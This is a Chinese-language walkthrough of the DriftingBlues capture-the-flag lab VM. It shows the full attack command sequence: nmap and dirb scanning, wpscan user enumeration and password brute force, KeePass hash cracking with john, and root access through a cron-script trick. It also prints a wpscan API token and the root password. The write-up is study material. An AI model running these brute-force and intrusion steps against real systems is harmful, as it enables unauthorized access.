信息收集
nmap发现主机
nmap 192.168.56.0/24
Nmap scan report for 192.168.56.131
Host is up (0.0031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
dirb扫描目录
dirb http://192.168.56.131/
发现worldpress登录页面
http://192.168.56.131/wp-login.php
有目录遍历
http://192.168.56.131/wp-includes/
http://192.168.56.131/wp-admin/includes/
http://192.168.56.131/wp-admin/images/
http://192.168.56.131/wp-content/uploads/
...
爆用户
wpscan --url http://192.168.56.131/ -e u
爆密码,爆不出来
wpscan --url http://192.168.56.131/ -U ~/u.txt -P /usr/share/wordlists/rockyou.txt -t 50
扫漏洞,没有合适的漏洞
wpscan --url http://192.168.56.131/ --api-token H3WNWY5YnLBhWcQtyQ2cP6IyVOhWiwAIsJH7F1WxBfc -e vp,vt,tt
根据目录生成字典
cewl -m 5 -w pass.txt 192.168.56.131
再次爆破用户密码
wpscan --url http://192.168.56.131/ -U ../u.txt -P pass.txt
成功登录,但用户权限低
看了WP才知道http://192.168.56.131/wp-content/uploads/2021/02/dblogo.png
图片有隐写ssh密码
获取shell
经过逐一测试,该密码是gill用户的密码,登录ssh
ssh gill@192.168.56.131
权限提升
查看系统版本,按版本查找漏洞
uname -a
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
没有内核提权漏洞
searchsploit -s 'debian 4.19'
Exploits: No Results
Shellcodes: No Results
上传执行linpeas.sh脚本,发现keyfolder目录
工具地址:https://linpeas.sh
上传执行pspy脚本,监控定时任务,发现key.sh每分钟都在执行
scp ./Desktop/pspy64 gill@192.168.56.131:/home/gill
工具地址:https://github.com/DominicBreuker/pspy
下载用户目录下的keyfile.kdbx文件,这是一个储存密钥的文件,同时自身也有密码
scp gill@192.168.56.131:/home/gill/keyfile.kdbx ./
hash爆破文件密码
keepass2john keyfile.kdbx > keyhash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt keyhash.txt
用在线网站https://app.keeweb.info导入文件并输入密码打开
这些并不是root密码
查看wp后,才知道要在/keyfolder
目录下创建以下名称的目录或文件
2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde
mkdir fracturedocean 或 touch fracturedocean
创建名为fracturedocean的目录后,keyfolder文件夹内多出了rootcreds.txt文件
查看文件内容,发现是root密码
root creds
imjustdrifting31
有了root权限后,查看key.sh文件内容
#!/bin/bash
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
echo "root creds" >> /keyfolder/rootcreds.txt
echo "" >> /keyfolder/rootcreds.txt
echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi